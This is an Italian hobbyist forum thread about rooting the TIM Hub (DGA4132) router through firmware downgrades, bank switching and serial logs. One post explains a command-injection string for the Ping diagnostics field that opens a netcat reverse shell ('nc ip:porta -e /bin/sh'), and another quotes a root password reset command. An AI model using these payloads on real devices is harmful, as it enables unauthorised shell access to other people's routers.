IlPuntoTecnico
Hardware e Software => Connessioni ADSL/VDSL/FTTC => Topic aperto da: shdf - 20 Ottobre 2017, 11:51
-
(https://s7.postimg.org/whj02yomz/tim-hub.jpg)
UPDATE 10/12/2017:
LO SBLOCCO DEL ROUTER E' IN FASE DI VALUTAZIONE.
-------------------------------------------------------------
Ciao,
si è confermato che si puo sbloccare il DGA4132 con l'unlocker del DGA4130
http://www.hwupgrade.it/forum/showpost.php?p=45110017&postcount=253
Apro una discussione qui per evitare di inquinare il Topic del dga4130
Spero che questo sia vero perché l'ho appena acquistato su eBay :yesss:
-
Quando torno a casa oggi pomeriggio provo.
In caso potrei usare la gui del 4130?
-
Ciao,
si è confermato che si puo sbloccare il DGA4132 con l'unlocker del DGA4130
http://www.hwupgrade.it/forum/showpost.php?p=45110017&postcount=253
Apro una discussione qui per evitare di inquinare il Topic del dga4130
Spero che questo sia vero perché l'ho appena acquistato su eBay :yesss:
shdf quanto lo hai pagato ? su Amazon 49 euro
Collet mi raccomando fammi sapere se il root funziona così lo ordino subito ,quando ha ancora la 1.02 o 1.0.3
-
l'ho preso su ebay, 55€.
http://www.ebay.it/itm/MODEM-ROUTER-TIM-HUB-ADSL-ADSL2-VDSL-EVDSL-FIBRA-FINO-A-1000-MEGA-NUOVO-2017-/272877794793
-
l'ho preso su ebay, 55€.
http://www.ebay.it/itm/MODEM-ROUTER-TIM-HUB-ADSL-ADSL2-VDSL-EVDSL-FIBRA-FINO-A-1000-MEGA-NUOVO-2017-/272877794793
quando esce si può abbinare sopra la nuova Tim box Android TV con DVB-T2 H265 http://www.dday.it/redazione/23837/tim-box-tim-games
-
ho apeno ricevuto il DHL tracking number :toohappy:, Penso che lo riceverò il prossimo lunedì.
-
ho apeno ricevuto il DHL tracking number :toohappy:, Penso che lo riceverò il prossimo lunedì.
dati postati da un possessore Tim Hub :
Fornitore del prodotto
Technicolor
Nome prodotto
AGHP
Versione Software
AGTHP_1.0.3
Versione Datapump
A2pvbH042u.d26o
Firmware OID
595b885abd3c1a55a7e453a4
Versione Bootloader
17.19.1062-0000000-20170512080206-5bebd9fb97718f93b20bca231a620df630da9918
Bootloader OID
59156bce30d40f7fd11860f1
Versione Hardware
VBNT-S
-
Quando torno a casa oggi pomeriggio provo.
In caso potrei usare la gui del 4130?
la Gui è uguale al 4130 , puoi dirmi quanto segna sul Tim hub la wifi 2,4 ? 130Mbps o 270-300Mbps
-
Ehm, il modem c’è l’ho già da una settimana.. intendevo dire che in caso di possibilità di sblocco (devo ancora provare), se potevo mettere la web gui di ansuel
-
Appena vi arriva e lo sbloccate fate le vostre considerazioni e mndate immagini. sono molto tentato
-
Ehm, il modem c’è l’ho già da una settimana.. intendevo dire che in caso di possibilità di sblocco (devo ancora provare), se potevo mettere la web gui di ansuel
se l'hai per favore puoi provare lo sblocco senza nuova GUI, e dirci se puoi collegare in SSH con root/root ?!
Grazie !
per il momento c'è solo una persona che ha confermato che è sbloccabile.
una seconda persona è sempre più rassicurante :D:
-
Ehm, il modem c’è l’ho già da una settimana.. intendevo dire che in caso di possibilità di sblocco (devo ancora provare), se potevo mettere la web gui di ansuel
si capito grazie ,la wifi è migliore del 4130,e la 2,4ghz è a 300Mbps o 130Mbps :pirl:
-
se l'hai per favore puoi provare lo sblocco senza nuova GUI, e dirci se puoi collegare in SSH con root/root ?!
Grazie !
per il momento c'è solo una persona che ha confermato che è sbloccabile.
una seconda persona è sempre più rassicurante :D:
Iobit driver booster 5 mi ha mandato una notifica di un fixed per la falla wifi WPA2 ,faccio il download ?
https://www.iobit.com/en/tips-install-windows-patches-for-wpa2-and-related-driver-updates-to-prevent-krack-attack-109.php
io ho una key per la pro ,bisogna ogni volta prima spegnere il wifi scrivere la chiave ,poi riaccendere in wifi
-
ho provato con l'unlocker versione0.9.6 ma non funziona, si blocca a metà.
-
:martello: :martello: :martello:
se qualcuno è membro del forum hwupgrade.it, puo dire a questo Hermann1871 cosa ne penso...
-
ho provato con l'unlocker versione0.9.6 ma non funziona, si blocca a metà.
:martello: NOOOOO... :destroyall: meno male che non l'ho ordinato :lolz:
-
ho provato con l'unlocker versione0.9.6 ma non funziona, si blocca a metà.
puoi dirci per favore che firmware hai ? 1.0.2 o 1.0.3 ? forse lui ha riuscito con un firmware piu vecchio ? (speranza)
-
puoi dirci per favore che firmware hai ? 1.0.2 o 1.0.3 ? forse lui ha riuscito con un firmware piu vecchio ? (speranza)
lo ha da 1 settimana quindi dovrebbe avere 1.0.3 ,ma a te ti arriverà con la 1.0.2 quindi è lecito avere 1 piccola speranza. Dovresti provare a sbloccarlo prima di metterlo in rete.
-
:martello: :martello: :martello:
se qualcuno è membro del forum hwupgrade.it, puo dire a questo Hermann1871 cosa ne penso...
Brutta notizia quindi... Mi sa che al momento mi tengo l'evo....
-
http://www.hwupgrade.it/forum/showthread.php?p=45114706#post45114706
vero o no ?
col firmware 1.0.2 dice che l'unlocker funzionerà...
-
http://www.hwupgrade.it/forum/showthread.php?p=45114706#post45114706
vero o no ?
col firmware 1.0.2 dice che l'unlocker funzionerà...
Si tratta di una strepitosa, solenne, cosmica ST.....TA messa non si sa bene come in giro. Tra l'altro andrebbe scritto in cubitale che benché lo Smart Modem Plus (DGA4130) e il fratello maggiore TIM Hub (DGA4132) condividano più o meno sia lo stesso hardware che la stessa numerazione progressiva dei firmwares, il DGA4132 utilizza Aqua 17.1 che inibisce il tool proprio perché va a fixare la falla di sicurezza che ha permesso la nascita del tool di sblocco di Ansuel & ADeltaX. Quindi a meno di future vulnerabilità da scoprire e da sfruttare ALLO STATO ATTUALE IL DGA4132 NON SI PUO' SBLOCCARE !!!!!!!!!!!!!!!! (mettetelo in calce in prima pagina così almeno chi legge evita di fare voli pindarici).
Detto ciò, chiudete il thread che è inutile e torniamo a parlare di cose serie. :asd:
-
OK
-
ho ricevuto il modem, con il firmware 1.0.3
Per verificare, ho provato il downgrade a 1.0.1 e 1.0.2 con TFTPD, il modem si riavvia sempre in 1.0.3, dunque activebank = 2 ? :shock:
se qualcuno mi vuole guidare per fare dei tests, nessun problema :bye:
-
Citazione da: TeddyRaspin76 - Oggi alle 18:48
Per chi ha TIM HUB (DGA4132), eccovi il nuovo firmware 1.0.5 by TIM, ufficiale, non beta.
https://drive.google.com/file/d/0By28-1YVDM4NV21QMl9sdzhyZ28/view?usp=sharing
-
è come flashare ? :shock: con TFTPD non va sul bank_2
-
Ciao a tutti,
ho fatto qualche test ed in effetti adesso il bug sul form del ping in formato ipv6 non c'è più ... probabilmente dopo aver fatto il fix sulla 1.0.4 del DGA4130 hanno fatto porting sulla GUI del DGA4132 (porting tutto sommato semplice ... "ad occhio" mi sembra che le pagine siano quasi uguali, fatto salvo le doverose modifiche sulle parti differenti, tipo le porte ethernet).
Mi stavo invece chiedendo se hanno "sanitizzato" correttamente il campo upload dei file, chissà se popolandolo opportunamente si riesce a fare upload in un'area arbitraria del filesystem.
PS:
Non ho provato, è solo uno spunto di riflessione
-
Appena qualcuno lo riceve e lo sblocca... (anche se ripeto ho seri dubbi...) mi servirebbe una particolare chiave specifica per il modello mi contatti per pm che do le istruzioni su come fare :)
-
i'm wondering if the modem updates to a new firmware from cwmp, maybe it would go back to bank1 and the tftpd flash would work...but as i'm not a TIM member i will never receive any firmware updates... :smash:
-
Someone found a way to force the switch to bank 1 on a Technicolor TG799 :
https://forums.whirlpool.net.au/archive/2650998#r55075373
but without a serial console it's quiet impossible to find the good timing for the reset...
-
Sono fiducioso anche per lo sblocco del Tim HUB.
Diamo tempo al tempo ...
-
Someone found a way to force the switch to bank 1 on a Technicolor TG799 :
https://forums.whirlpool.net.au/archive/2650998#r55075373
but without a serial console it's quiet impossible to find the good timing for the reset...
Ho seguito quella discussione, ma non ricordo se qualche canguro ha provato anche un normale power-cycle 30-30-30. Appena ho tempo provo io.
-
Bene, facci sapere, sono convinto che pure l'HUB possa fare la stessa fine dello scola 2.0 a livello di sblocco.
-
Bene, facci sapere, sono convinto che pure l'HUB possa fare la stessa fine dello scola 2.0 a livello di sblocco.
Beh, per lavorare su quella strada basterebbe incominciare a registrare tutto lo scambio di dati che avviene lato WAN in fase di aggiornamento, ovvero bisognerebbe prendere un'unità 1.02 e interfacciarla in qualche modo che permetta di ricostruire il dialogo con l'esterno su linea dsl, in modo da poter settare una piattaforma TR069 custom per gestirlo, purtroppo non penso sia così facile da realizzare, né fargli credere di essere il server di provisioning, tantomeno l'ACS.
Purtroppo non ho tempo da dedicare a simili esperimenti, ciascuno ha le proprie beghe da gestire, sarei felicissimo se questo spunto potesse aver acceso una lampadina a qualcuno con le capacità e molto, molto tempo libero... :idea:
-
@Ansuel
questo : https://www.ilpuntotecnico.com/forum/index.php/topic,77325.msg224034.html#msg224034
Non c'è controllo, ogni cosa che viene scritta, finisce in option dest_mac
non puo essere una falla che possiamo sfruttare ? è una falla del firmware originale ?
-
@Ansuel
questo : https://www.ilpuntotecnico.com/forum/index.php/topic,77325.msg224034.html#msg224034non puo essere una falla che possiamo sfruttare ? è una falla del firmware originale ?
Direi proprio di no, felice comunque di essere smentito.
-
Ciao ragazzi!
Ho ricevuto questo router. C'è qualcosa che dovrei sapere per cominciare a mettere le mani? che so, informazioni sulla seriale, console telnet/ssh... qualunque cosa possa mettermi al corrente dei nuovi sviluppi. Purtroppo sono rimasto fuori dal giro per un po'.
Ovviamente avendo il router tra le mani posso farci il cavolo che voglio. Insomma, sono una cavia volontaria :D
-
Se puoi saldare seriale un bootlog sarebbe utile
-
OK. Intanto il router ancora non l'ho aperto. Può servire una foto fatta bene della board?
EDIT: visto ora che ci sono su HWupgrade. Chi se ne frega, quando lo apro ne faccio di mie e le posto, così non abbiamo problemi di licenze.
EDIT2: niente da fare, su hwup le foto sono in licenza Creative Commons. Non mi vogliono far lavorare xD
EDIT3: OK, ho aperto il maledetto. Penso anche di aver individuato la piazzola della seriale, ma non ho tempo stasera di controllare bene, farò domani o comunque a giorni. Vo pongo una domanda: qualora fosse necessario cortocircuitare qualcosa, come si fa a sapere cosa? Datasheet del chipset?
-
Se qualcuno sa programmare in Python, avrei una mezza idea di come rootare il DGA4132 e ottenere quindi lo stesso risultato del DGA4130. :smirk:
-
ho ricevuto il modem, con il firmware 1.0.3
Per verificare, ho provato il downgrade a 1.0.1 e 1.0.2 con TFTPD, il modem si riavvia sempre in 1.0.3, dunque activebank = 2 ? :shock:
se qualcuno mi vuole guidare per fare dei tests, nessun problema :bye:
Ho ricevuto il modem stamattina, con fw 1.0.3 e ho aggiornato a 1.0.5 da TFTP. Quando si riavvia rimane 1.0.3, ma è sufficiente cliccare su "reset impostazioni di fabbrica" che viene caricato tutto correttamente sulla GUI e viene riportato 1.0.5 senza problemi.
Quindi se vuoi riprova a downgradare a 1.0.1 con TFTP e una volta che si riavvia dalla gui ripristina le impostazioni di fabbrica. ;)
-
Ciao,
ho provato ma non funziona...forse c'è qualcosa che non ho capito bene...puoi spiegare meglio, in inglese ?
Devo flashare la versione 1.0.5 o era solo un esempio ?
ho flashato la 1.0.1.001 con TFTP, al riavvio sono sempre con firmware 1.0.3, Faccio clic sul pulsante della GUI : "Impostazioni di fabbrica"
aspetto che il modem riavvia...e sono sempre col firmware 1.0.3
-
Ciao,
ho provato ma non funziona...forse c'è qualcosa che non ho capito bene...puoi spiegare meglio, in inglese ?
Devo flashare la versione 1.0.5 o era solo un esempio ?
ho flashato la 1.0.1.001 con TFTP, al riavvio sono sempre con firmware 1.0.3, Faccio clic sul pulsante della GUI : "Impostazioni di fabbrica"
aspetto che il modem riavvia...e sono sempre col firmware 1.0.3
The default (stock) boot for the DGA4132 is on Bank1. Of course if you have received a firmware update (or a modem already updated by TIM) it could happen that
a bank swith has occurred (bank_2). In the latter case you can't do anything or at least you can hope tim ISP (or similar provider) will upgrade your device via CWMP
and modem will switch again to the other bank.
-
unfortunately an update from CWMP would never happen if you're not a TIM subscriber.
But if if the default is to boot from bank1, then how could i be on bank2 ? ibought it brand new...
-
Se qualcuno sa programmare in Python, avrei una mezza idea di come rootare il DGA4132 e ottenere quindi lo stesso risultato del DGA4130. :smirk:
perchè solo python ? :huh:
Ho una buona conoscenza di Autoit https://www.liveboxinfo.ga/ :nod:
-
unfortunately an update from CWMP would never happen if you're not a TIM subscriber.
But if if the default is to boot from bank1, then how could i be on bank2 ? ibought it brand new...
And are you pretty sure that TFTP correctly flash fw file ? When modem in in BOOTP Mode the "i" (Info) Led should flash for approx 1 min
with orange light and then modem restarts itself.
If this is the same behaviour you experienced, then your modem could be on bank_2 but don't ask me why, it would be a very strange
thing. :huh:
-
perchè solo python ? :huh:
Perché mi sembrava più semplice, ma se si possono iniettare comandi al modem anche in altro linguaggio ben venga. :P
-
Ho una buona conoscenza di Autoit https://www.liveboxinfo.ga/
-
And are you pretty sure that TFTP correctly flash fw file ? When modem in in BOOTP Mode the "i" (Info) Led should flash for approx 1 min
with orange light and then modem restarts itself.
If this is the same behaviour you experienced, then your modem could be on bank_2 but don't ask me why, it would be a very strange
thing. :huh:
well...now i'm wondering...
This what i'm doing:
1) i start TFTPD
2) with a paper clip i press the reset button in the back and i hold it down
3) i start the modem and i wait
4) TFTPD open a window saying it started sending the firmware
5) i remove the paperclip
6) the file is sent
4) the modem reboot
i do another try to see about the "i" light...
Edit:
i confirm, it goes to Orange for about 1 minute, here are the logs during the process :
Rcvd BootP Msg for IP 0.0.0.0, Mac 10:13:31:B4:05:BA [09/12 19:44:55.234]
Client requested address 0.0.68.0 [09/12 19:44:55.250]
DHCP: proposed address 192.168.1.3 [09/12 19:44:59.891]
Rcvd BootP Msg for IP 0.0.0.0, Mac 10:13:31:B4:05:BA [09/12 19:44:59.891]
Client requested address 0.0.68.0 [09/12 19:44:59.891]
Connection received from 192.168.1.3 on port 2003 [09/12 19:44:59.906]
Read request for file <AGTHP_1.0.1_001_CLOSED.rbi>. Mode octet [09/12 19:44:59.906]
OACK: <blksize=1024,> [09/12 19:44:59.906]
Using local port 50855 [09/12 19:44:59.906]
Suppress pingable address 192.168.1.3 [09/12 19:45:04.031]
<AGTHP_1.0.1_001_CLOSED.rbi>: sent 25072 blks, 25673035 bytes in 8 s. 0 blk resent [09/12 19:45:07.844]
DHCP: proposed address 192.168.1.4 [09/12 19:45:08.688]
Rcvd BootP Msg for IP 0.0.0.0, Mac 10:13:31:B4:05:BA [09/12 19:45:08.688]
Client requested address 0.0.68.0 [09/12 19:45:08.688]
DHCP: proposed address 192.168.1.4 [09/12 19:45:14.339]
Rcvd BootP Msg for IP 0.0.0.0, Mac 10:13:31:B4:05:BA [09/12 19:45:14.339]
Client requested address 0.0.68.0 [09/12 19:45:14.339]
DHCP: proposed address 192.168.1.4 [09/12 19:45:19.980]
Rcvd BootP Msg for IP 0.0.0.0, Mac 10:13:31:B4:05:BA [09/12 19:45:19.980]
Client requested address 0.0.68.0 [09/12 19:45:19.980]
DHCP: proposed address 192.168.1.4 [09/12 19:45:24.625]
-
@TeddyRaspin76
did you successfully downgraded to 1.0.1.001 ?
The strange thing with the firmware version 1.0.1.x is that inside the file it says : VBNT-K (like the DGA4130)
They started writing VBNT-S only since firmware version 1.0.2.001 so i'm wondering that it is now impossible to go back to 1.0.1 if the system check for this string...
Edit:
no luck with firmware 1.0.2.001 the behavior is just the same..."the factory default" from the gui doesn't change anything...
-
There is nothing to say except you're absolutely on Bank_2. You have to wait for something able to force firmware upgrade or unlocking root.
-
OK but did you successfully downgraded to 1.0.1.001 ?
-
Yes and it is not unlockable. AGTHP uses a different bootloader and release version since first firmware, in other words the "DGA4130 exploit" never existed in the DGA4132. :(
-
that's strange, because the file date in the Ansuel repo is way earlier than the date where the Exploit was released on internet...
the file is dated : 2017 May 16
The blog date : 2017 July 14 https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways/
-
Se qualcuno sa programmare in Python, avrei una mezza idea di come rootare il DGA4132 e ottenere quindi lo stesso risultato del DGA4130. :smirk:
puoi dirci di più? o da MP?
-
Se qualcuno sa programmare in Python, avrei una mezza idea di come rootare il DGA4132 e ottenere quindi lo stesso risultato del DGA4130. :smirk:
Io mi trovo più a mio agio in php, ad ogni modo se ti và di spiegarci l'idea di base valutiamo il dà farsi :clap:
-
In buona sostanza l'idea di base è questa.
L'exploit possibile sul firmware 1.0.3 del DGA4130 si basa su una falla nel menu Ping, sotto Diagnostica, in cui non c'è controllo sulla sintassi degli indirizzi IPv6 inseriti.
Non a caso l'exploit si basa sull'inserimento della stringa ::::::;nc ip:porta -e \bin\sh che ha il seguente significato :
:::::: (indirizzo IpV6 vuoto separato dai due punti :)
; (interruzione dell'istruzione)
nc (netcat) interroga l'IP di gateway su una determinata porta
-e \bin\sh (esegue la shell Linux contenuta dentro \bin)
Ora questa mancanza di controllo è stata fixata in versioni successive della webui, però è sufficiente prendere il sorgente del menu diagnostics (.lua credo) del fw 1.0.3 di un DGA4130
e confrontarlo con quello del fw 1.0.4 (sempre del DGA4130), operazione possibile sui modem già precedentemente rootati.
A questo punto pensavo e vi domando se fosse possibile patchare in memoria tramite Python o altro linguaggio di programmazione la webui o la funzione che il menu Ping va a richiamare,
in modo da bypassare il check che viene fatto sull'indirizzo IPv6 inserito e permettendo quindi l'esecuzione di codice eseguibile (netcat etc etc).
Perché alla fine sia il DGA4130 che il DGA4132 sono identici in tutto e per tutto lato firmware, exploit a parte che esiste solo su 1.0.3 di AGTEF, mentre AGTHP (cioè il DGA4132) nasce già con la falla fixata.
Ritengo più intrigante questa sfida visto che oramai il DGA4130 offre di tutto e di più e la GUI di Ansuel è già ultra completa di suo (a parte bug minori che comunque il buon Ansuel continua a fixare).
Se avete idee alternative son qui. ;)
-
But the exploit is in the file : /usr/lib/lua/web/post_helper.lua which cannot be accessed from the web...
it's the file where the sanitize function is declared. i don't remember where i read that, but i checked and it's true.
in diagnostics-ping-modal.lp there is at the begining:
local post_helper = require("web.post_helper")
which load the functions that helps to manage the data sent from the WEB (POST requests).
It's not like it was a javascript function executed on client side. unfortunately...
-
Well, it would be nice to compare the post_helper.lua from a 1.0.3 fw on DGA4130 rooted device with the same file from a newer firmware (1.0.4.xxx) and
see which are the differences. It would be nice if it could be possible to inject with Python (pyload) or any other script the old helper.lua in order to accept
any command in the Ping menu and so unlock any DGA4130/DGA4132 with any firmware onboard.
-
@shdf
Hi again. I can't understand why the BOOTP mode now let me only to flash the same firmware or an updated version. I can't downgrade at all. Could you help me please ? :pray:
-
how could i help ? lol i'm stuck on firmware 1.0.3 since the begining..
i only flahsed previous firmware, never a newer because i'm affraid to not be able to go back, as it is happening to you unfortunately...
But did the system moved you on bank 2 for some reason ? or is it the firmware who installed a new bootloader blocking old firmware...who knows...
-
Do we know how to build an encrypted config.bin file ? which is the only file that we can inject in the modem ?
in the DGA4130 what is the command to create this file ?
Maybe using the info on the dga4132 sticker (MAC, GW, SN,...) sticked below the modem, we can create a config.bin from the DGA4130.
-
no we can't as it use 2 random key stored in a rip partition...
oh and they are different from one modem to another so there isn't a general key :)
-
salve, ho 3 di questi router, se posso aiutarvi in qualche modo sono molto disponibile, ho abbastanza esperienza in elettronica, ci lavoro, stavo pensando di estrarre l'intera immagine della flash da 2 gb che si trova nel lato posteriore immediatamente sotto il SOC, dissaldandola e mettendola in un programmatore, secondo voi potrebbe avviarsi flashandoci l'immagine estratta da un dga4130? che non possiedo tuttora quindi dovrò prenderne qualcuno, oppure ci saranno dei checksum o sistemi strani che ne impediranno l'avvio? l'HW è molto simile, teoricamente potrebbe anche accettarla.
-
se hai accesso alla flash una cosa carina sarebbe flasharci il bootloader del dga4130.... in quel modo dovrebbe accettare immagini agtef e abbiamo sbloccato il modem....
-
se hai accesso alla flash una cosa carina sarebbe flasharci il bootloader del dga4130.... in quel modo dovrebbe accettare immagini agtef e abbiamo sbloccato il modem....
Non sarebbe più interessante un dump della flash, per analizzare il contenuto del filesystem ?
Dato che il vecchio bug è fixato, direi di cercare qualche altro input box presente nella GUI, che magari potrebbe essere forzabile: come avevo scritto in un precedente post mi ero "fissato" sul campo upload file... ci ho giocato un po' ma non trovo modo di forzare upload in cartelle del filesystem arbitrarie.
Ricordo anche che su altri modem si poteva "giocare" con lo storage usb ed inserendo dei link simbolici "ad hoc" si riusciva ad accedere al filesystem interno... qualcuno ha indagato in questa direzione ?
-
io quoto matteone2.. non è che abbiamo sbloccato tanto.. o meglio.. non è una cosa molto accessibile a tutti. sicuramente un dump totale è qualcosa di utile per analisi, e lo proverò a fare nonappena trovo il modo di leggere la flash (scopro ora che il mio beeprog 1 non legge flash grandi 2 gb maledizione. quindi mi costruirò un flasher con qualcosa come teensy++ o arduino e vedrò di estrarre l'intero contenuto). e poi a mettere un'immagine agtef non hai un agthp.. ovvero niente porta per la ftth e piccole differenze varie.. comunque
-
Magari Ansuel intendeva dire di flashare un fw agtef, rootare e poi riflashare un agthp. Forse così facendo rimane il root (un po' come si fa nel passaggio 1.0.3 -> 1.0.4)
-
Magari Ansuel intendeva dire di flashare un fw agtef, rootare e poi riflashare un agthp. Forse così facendo rimane il root (un po' come si fa nel passaggio 1.0.3 -> 1.0.4)
Credo che intendesse più dire che se flashi il bootloader con quello del DGA4130, poi accettando i firmwares di quest'ultimo, il DGA4132 diventi praticamente un clone
del DGA4130 (e già lo è in buona sostanza). Ma alla fine sarebbe un DGA4130 con la scocca del fratello maggiore. ;)
-
non so se può servire a qualcuno, intanto ho estratto un log della sequenza di avvio con la seriale TTL
http://www.mediafire.com/file/sw4w4h95in1iasf/boot.log (http://www.mediafire.com/file/sw4w4h95in1iasf/boot.log)
-
non so se può servire a qualcuno, intanto ho estratto un log della sequenza di avvio con la seriale TTL
http://www.mediafire.com/file/sw4w4h95in1iasf/boot.log (http://www.mediafire.com/file/sw4w4h95in1iasf/boot.log)
E' un'ottima cosa ma servirebbe conoscere le chiavi all'interno di /proc/rip al fine di decryptare il firmware .rbi,
usare binwalk e avere quindi un dump decryptato del firmware. :)
-
non so se può servire a qualcuno, intanto ho estratto un log della sequenza di avvio con la seriale TTL
http://www.mediafire.com/file/sw4w4h95in1iasf/boot.log (http://www.mediafire.com/file/sw4w4h95in1iasf/boot.log)
Thank you for that !
According to the bank switch trick here : https://forums.whirlpool.net.au/forum-replies.cfm?t=2650998&p=15#r289
The step :
[ 26.998000] USB Serial support registered for Qualcomm USB modem
for the AGTHP is at :
[ 22.486000] USB Serial support registered for Qualcomm USB modem
So does it mean that we have to push the reset button 23 seconds after starting the modem ?
in the log, how long does it take for the part with no timing up to the first line where the timing is added ?
[ 0.000000] Booting Linux on physical CPU 0
-
Buongiorno, qualche novità in merito?
-
Buongiorno ragazzi news :pray:
-
Stavo valutando l'acquisto di un dga4130 oppure di un dga4132.
Oggi ho acquistato un dga4130 per sostituire il mio attuale modem e metterlo in funzione quanto prima.
Con la fortuna che ho, a breve verrà pubblicato il sistema per lo sblocco, me lo sento!
Vorrei anche acquistare un dga4132 x fare qualche test, ma ho paura di portare sf**a!
-
In linea di massima la sensazione è molto corretta :)
Stay tuned ;)
-
Non voglio smorzare l'entusiasmo di nessuno, ma allo stato attuale non ci sono falle di sicurezza, lato LAN/WAN che si possono sfruttare per abilitare la shell Linux e ottenere così i privilegi root, come avviene invece sul fw 1.0.3 (Aqua 16.3) del DGA4130.
Poi, felice di venire smentito. :)
-
@-Mirco- Teasing selvaggio ahahahah
@TeddyRaspin76 Ascolta Mirco, pure a me stasera è venuta :-X
-
@TeddyRaspin76 l'exploit dovrebbe essere stato individuato, resto col condizionale dato che non ho il dispositivo e non posso fare i test.
Restate sintonizzati e speriamo bene :nod:
-
E quale sarebbe ? Fonte ???
-
Dovresti esserne venuto a capo dato che ho letto nell'altra sezione :D
Da possesso del dispositivo ben venga anche il tuo apporto se possibile! :clap:
-
Quindi voi dite di aspettare ad acquistare un dga4130 che presto potrebbe essere sbloccato anche questo?
-
Esatto ;)
-
ragazzi, ho provato quell'exploit che dicono (usando il campo del dyndns) ma nulla.. ora non capisco se vuole la WAN connessa oppure no..
-
Occorre il firmware 1.0.3 per l'exploit e non serve avere linea DSL o FTTH attiva.
-
@shdf ma in che cosa consiste il metodo di sblocco tramite una chiavetta USB 4G?
-
Occorre il firmware 1.0.3 per l'exploit e non serve avere linea DSL o FTTH attiva.
ah che c**o.. io ho la 1.0.5
-
ah che c**o.. io ho la 1.0.5
E leggere la mia guida in stick no ??? :D
-
Pardon era un po’ che non venivo sul forum, l’ho vista poco fa.. domani la testo :)
-
@shdf ma in che cosa consiste il metodo di sblocco tramite una chiavetta USB 4G?
questo è un po' complicato perche non funziona con tutte le chiavette 3G/4G, solo roleo è riuscito con una chiave Huawei E392.
-
Ciao, anche il mio Modem Router di Tim Hub è aggiornato alla 1.0.5 :(
-
con un po 'di fortuna, se siete su Bank_1 potete sempre provare di flashare il firmware 1.0.3 con tftpd.
-
@shdf ma in che cosa consiste il metodo di sblocco tramite una chiavetta USB 4G?
Vi invito ad aspettare la guida ufficiale per lo sblocco ed il relativo topic ufficiale.
Portate pazienza che a breve sarà tutto pronto. :)
-
Grandioso non vedo l'ora di provare!
-
Figata... speriamo si possano avere tutte le funzioni come nel 4130... ho visto che con quello hanno abilitato anche la blacklist.
-
Intanto con la guida che ho pubblicato e che gentilmente @-Mirco- ha messo in stick, chi ha fw 1.0.5 può flashare e tornare a 1.0.3,
indipendentemente se si trova su bank1 o bank2. :P
-
In stick ovvero? Non la trovo
-
Quindi per poter sbloccare è necessario aggiornare il firmware di TIM Hub alla 1.0.3?
Cosa significa bank 1 o bank 2?
p.s.
Facendo il downgrade del firmware alla 1.0.3 non è che poi lo aggiorna con la ultima versione ?
-
In stick ovvero? Non la trovo
Tra i topic in evidenza, ovvero quelli importanti che trovi in cima alla sezione.
Quindi per poter sbloccare è necessario aggiornare il firmware di TIM Hub alla 1.0.3?
Cosa significa bank 1 o bank 2?
p.s.
Facendo il downgrade del firmware alla 1.0.3 non è che poi lo aggiorna con la ultima versione ?
Queste sono tutte domande che verranno sviscerate nella guida e poi nel relativo topic ufficiale che verrà creato a breve.
Ripeto, avete pazientato fino ad ora, resistete ancora un pochino di tempo :)
-
Pazienza io? ROTFL....
ma è solo uno sblocco del modem o si potranno già fare mod tipo il 4130?
A me interessa soprattutto modificare la potenza del wifi, avere il filtro mac address, gestire da remoto e anche molto la blacklist delle chiamate.
-
Spero si possa modificare SNR etccc 😀
-
Ma per la fibra serve a qualcosa cambiare l'SNR?
-
Ho cercato di riportare all'attenzione la discussione che aveva iniziato Ansuel qui (https://forum.lede-project.org/t/broadcom-bin-something-usefull/6553). Non ho intenzione di restare su questa merdosissima build basata su kernel 3.4.11 a lungo, mi auguro veramente di poter aiutare chi è del mestiere a rendere questa board pienamente supportata da OpenWrt.
-
Ma per la fibra serve a qualcosa cambiare l'SNR?
Io parlo per me che attualmente ho la tradizionale 20mb ;-)
-
Ho attivato la ssh (*) con l'exploit DynDNS ma continua a darmi accesso negato quando inserisco le credenziali, qualche dritta?
* echo "root:root" | chpasswd
-
qui hai solo cambiato la password, devi anche riavviare dropbear.
-
Guida allo sblocco disponibile sul portale :clap:
Chiudo questo topic, si continua su quello ufficiale https://www.ilpuntotecnico.com/forum/index.php/topic,78162.0.html (https://www.ilpuntotecnico.com/forum/index.php/topic,78162.0.html)